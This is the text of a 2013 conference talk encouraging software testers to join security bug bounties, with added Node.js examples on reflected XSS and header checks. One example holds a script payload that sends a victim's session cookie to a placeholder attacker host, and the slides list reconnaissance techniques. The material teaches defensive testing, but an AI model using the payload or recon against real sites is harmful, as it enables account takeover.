Page 1: Testers, get into security bug bounties!

Testers, get into security bug bounties!

by Eusebiu Blindu

CzechTest 2013

Page 2: Testers, get into security bug bounties!

I am a tester, not a security expert

Page 6: Testers, get into security bug bounties!

http://www.utest.com/

Page 7: Testers, get into security bug bounties!

• potential cash

• some reputation

• experience

• skill improvement

Page 8: Testers, get into security bug bounties!

• "It's hard and I never did security stuff before" (psychological)

• "I don't have the skills" (technical)

• "I don't have time, I have to do something else, I can't fit it in my schedule" (logistics)

Page 9: Testers, get into security bug bounties!

• you don't have to fully compromise the target or expose a major flaw in order to be rewarded in security bug bounties

• you don't have to know that "much" to get started sending bug reports

• you don't need to be an expert in the field of security

Page 10: Testers, get into security bug bounties!

• Try to find small vulnerabilities

• Try bug bounty programs that don't offer cash, only mentions

• Try to read blogs containing reports of already rewarded bugs

Page 11: Testers, get into security bug bounties!

• A tester has the reflex of finding and sending general bug reports

• Can send "without shame" a bug report without fear of rejection

• Has a lot of skills that can be focused on security

Page 12: Testers, get into security bug bounties!

Reasons (why XSS is the bug class to start with):

• it is rewarded by almost every bug bounty program

• most feasible to look for (considering time spent, chances of finding and the reward value)

• should be easy for testers, because there is not much new technical knowledge involved

Page 13: Testers, get into security bug bounties!

(for testers to understand)

Simply put: "Make the website pop up a window with your own message, on the vulnerable domain, by entering that message into an input the site puts back into the page"

(but read more about it on the "internets"...)

Page 15: Testers, get into security bug bounties!

(... a tester might ask)

• With an XSS you can attack other users (not the server)

• It's one of the most common attacks

Page 16: Testers, get into security bug bounties!

1) Attacker sends the victim an email with a link (the link carries the XSS payload in a parameter of the vulnerable site)

2) Victim clicks on the link

3) The injected script sends the victim's session cookie to the attacker, who uses it to access the victim's account
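The popup proof of concept from page 13 and the three-step cookie theft above, as an added Node.js example that is not part of the original slides. The page renderer, the `q` search parameter and the host `attacker.example` are assumptions made for the example; the fix is plain HTML escaping, and the `HttpOnly` cookie flag is shown as the defence that blunts step 3.

```javascript
// Added example, not from the original slides: a reflected XSS in a
// hypothetical Node.js page renderer, the fixed version, and the
// proof-of-concept payloads a tester would send. Page layout, parameter
// name and hostnames are made up for the example.

// Vulnerable: the search term is pasted straight into the HTML.
function renderVulnerable(q) {
  return `<html><body><h1>Results for: ${q}</h1></body></html>`;
}

// Escape the characters that let text break out of an HTML text node
// or a quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Fixed: same page, term escaped before it reaches the markup.
function renderFixed(q) {
  return `<html><body><h1>Results for: ${escapeHtml(q)}</h1></body></html>`;
}

// The "popup" proof of concept from the slide: alert() on the vulnerable
// domain demonstrates script execution without harming anyone.
const POC_PAYLOAD = '<script>alert(document.domain)</script>';

// The attack from the three steps above: same injection point, but the
// script ships document.cookie to a host the attacker controls
// (attacker.example is a placeholder, not a real host).
const COOKIE_THEFT_PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?"' +
  '+encodeURIComponent(document.cookie)</script>';

// Step 1: the emailed link, payload URL-encoded into the parameter.
function attackLink(origin, payload) {
  return `${origin}/search?q=${encodeURIComponent(payload)}`;
}

// True when the payload lands in the page verbatim, i.e. a browser would
// execute it. This is the check a tester automates once a candidate
// parameter has been found.
function isReflectedUnescaped(render, payload) {
  return render(payload).includes(payload);
}

// Defence for step 3: with HttpOnly the session id is invisible to
// document.cookie, so even a working XSS cannot read it (the script can
// still act as the user by sending requests from inside the page).
function sessionCookieHeader(sessionId) {
  return `session=${sessionId}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}
```

Run `isReflectedUnescaped(renderVulnerable, POC_PAYLOAD)` to see the vulnerable page echo the script unchanged; the same call against `renderFixed` returns false because the angle brackets come back as `&lt;` and `&gt;`.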

Page 17: Testers, get into security bug bounties!

• error pages

• server banner pages

• clickjacking
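Checks for the three low-level findings above, as an added Node.js example that is not from the slides. The two captured responses are constructed for the example; the header names and the patterns used to spot a verbose error page are the assumptions.

```javascript
// Added example, not from the slides: three checks over a captured HTTP
// response, one per low-level bug class listed above. Both responses
// below are constructed for the example, not taken from a real site.
const SAMPLE_RESPONSE = {
  status: 500,
  headers: {
    Server: 'Apache/2.2.22 (Ubuntu)',
    'X-Powered-By': 'PHP/5.3.10',
    'Content-Type': 'text/html',
  },
  body: '<b>Fatal error</b>: Uncaught exception in ' +
        '/var/www/html/app/download.php on line 42',
};

// What a hardened server sends back: no version, framing forbidden,
// generic error body.
const HARDENED_RESPONSE = {
  status: 404,
  headers: {
    Server: 'Apache',
    'X-Frame-Options': 'DENY',
    'Content-Security-Policy': "frame-ancestors 'none'",
    'Content-Type': 'text/html',
  },
  body: 'Not found',
};

// Header names are case-insensitive; normalise once.
function lowerKeys(headers) {
  const out = {};
  for (const [k, v] of Object.entries(headers)) out[k.toLowerCase()] = v;
  return out;
}

// Clickjacking: the page can be loaded in an iframe on an attacker's site
// unless X-Frame-Options or a CSP frame-ancestors directive forbids it.
function checkClickjacking(headers) {
  const h = lowerKeys(headers);
  const csp = h['content-security-policy'] || '';
  if (/frame-ancestors/i.test(csp)) return null;
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY' || xfo === 'SAMEORIGIN') return null;
  return 'no X-Frame-Options and no CSP frame-ancestors: page can be framed';
}

// Server banners: a header that names a product together with a version.
function checkBanners(headers) {
  const h = lowerKeys(headers);
  const findings = [];
  for (const name of ['server', 'x-powered-by', 'x-aspnet-version']) {
    const value = h[name];
    if (value && /\d+\.\d+/.test(value)) findings.push(`${name}: ${value}`);
  }
  return findings;
}

// Error pages: a 5xx whose body leaks filesystem paths or source lines.
function checkErrorPage(status, body) {
  if (status < 500) return null;
  const leak = body.match(/(\/[\w.-]+){2,}\.\w+|[A-Z]:\\[\w\\.-]+|on line \d+|stack trace/i);
  return leak ? `verbose error page leaks: ${leak[0]}` : null;
}

function assess(resp) {
  return {
    clickjacking: checkClickjacking(resp.headers),
    banners: checkBanners(resp.headers),
    errorPage: checkErrorPage(resp.status, resp.body),
  };
}
```

`assess(SAMPLE_RESPONSE)` reports all three; `assess(HARDENED_RESPONSE)` reports nothing. Each of the three is the kind of report that is small on its own but, as page 19 says, can be a step towards something bigger (the leaked path, for instance, tells you where the application lives on disk).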

Page 19: Testers, get into security bug bounties!

• paid much more

• harder to find

• require more "out of the box" thinking

• need a little bit of luck

• can be found by chaining one or more low-level bug findings

Page 23: Testers, get into security bug bounties!

• https://www.site_to_be_tested.com/

• https://www.site_to_be_tested.com/download?filename=D://www_content/reports/12_01_2010.csv

Page 24: Testers, get into security bug bounties!

• Main tool should be your brain

• Scanners: Acunetix WVS, Burp Suite Pro, Dirbuster, SqlMap

• Visibility: Fiddler2

• Flash: HP SWFScan

• ... and Google Advanced Search

Page 26: Testers, get into security bug bounties!

• it will show you types of bugs on a website that you might not be familiar with

• crawl a website

• do certain activities faster than you

• occasionally find small or medium bugs that are rewardable

Page 27: Testers, get into security bug bounties!

• cannot think like a human

• will not find the major flaws

• will report lots of false positives (fake bugs)

• cannot guarantee a totally safe product

Page 28: Testers, get into security bug bounties!

Recommendation:

Use the tool at the beginning, once you have identified an area. Then continue manually, with complex steps and deeper investigation.

Page 29: Testers, get into security bug bounties!

Battlefield attack

Bug bounty field

Small Plan

Know where you can search for bugs

Page 30: Testers, get into security bug bounties!

• more chances to find bugs in newer bug bounty programs

• more chances to find bugs in newly added functionalities

• more chances to find bugs in products that are part of new acquisitions

Page 32: Testers, get into security bug bounties!

• you have to be faster than the competition, especially at the start of a new bug bounty program

• you have to be more creative than the competition to find complex issues

Page 33: Testers, get into security bug bounties!

• you can learn from what others already reported before you

• A little bit of healthy competition increases motivation

• the application will seem easier to hack after you saw someone else doing it

Page 34: Testers, get into security bug bounties!

• read the requirements and see what is rewardable

• list all the rewardable domains

• list all the rewardable subdomains

(see if Android or iOS platforms are rewardable etc)

Page 35: Testers, get into security bug bounties!

• read bug bounty requirements

• read about the product (on main website for example)

• read what was rewarded (social media, blogs, news articles)

• domains similar to the known valid ones

• whois records for domains belonging to the same company

• decrypt data from client apps (desktop, Android, iOS)

Page 36: Testers, get into security bug bounties!

• DNS records lookup

• similar IPs (consecutive) as other valid subdomains

• brute-force possible subdomain names ("qa.domain.com", "db.domain.com")

• Google search: "site:domain.com", "site:domain.com -site:www.domain.com"

• analyse page data (e.g. image files on the main site are served from a different, previously unknown subdomain)

Page 37: Testers, get into security bug bounties!

Just send something!

Page 39: Testers, get into security bug bounties!

• tools (they help, but they are not the main thing)

• learning about the business logic and complex functionality helps

• similar bugs in another area could exist

• the same techniques work differently for different people

Page 40: Testers, get into security bug bounties!

• database compromised: credentials found with scanners and by manually analysing files

• database compromised: credentials recovered by decompressing a Flash file

• database compromised: credentials obtained through an unfiltered download functionality

Page 41: Testers, get into security bug bounties!

• keep an open mind (Avoid "I will use only Ubuntu")

• overcome fear of succeeding (subconscious fear of winning, fear of envious reprisals at the workplace)

• see more ideas and approaches (social media)

• avoid "expert complex" (fear of trying "stupid" stuff)

Page 42: Testers, get into security bug bounties!

• social media can help you

• your personal standards rise, so you aim higher

Page 43: Testers, get into security bug bounties!

• there are not many testers promoting it

• the current format of bug bounties is new

• it is seen as a separate domain

Page 44: Testers, get into security bug bounties!

Give security bug bounties a try

And..

See if it works for you

Page 45: Testers, get into security bug bounties!

Thanks!

Eusebiu Blindu

http://www.testalways.com

[email protected]

@testalways

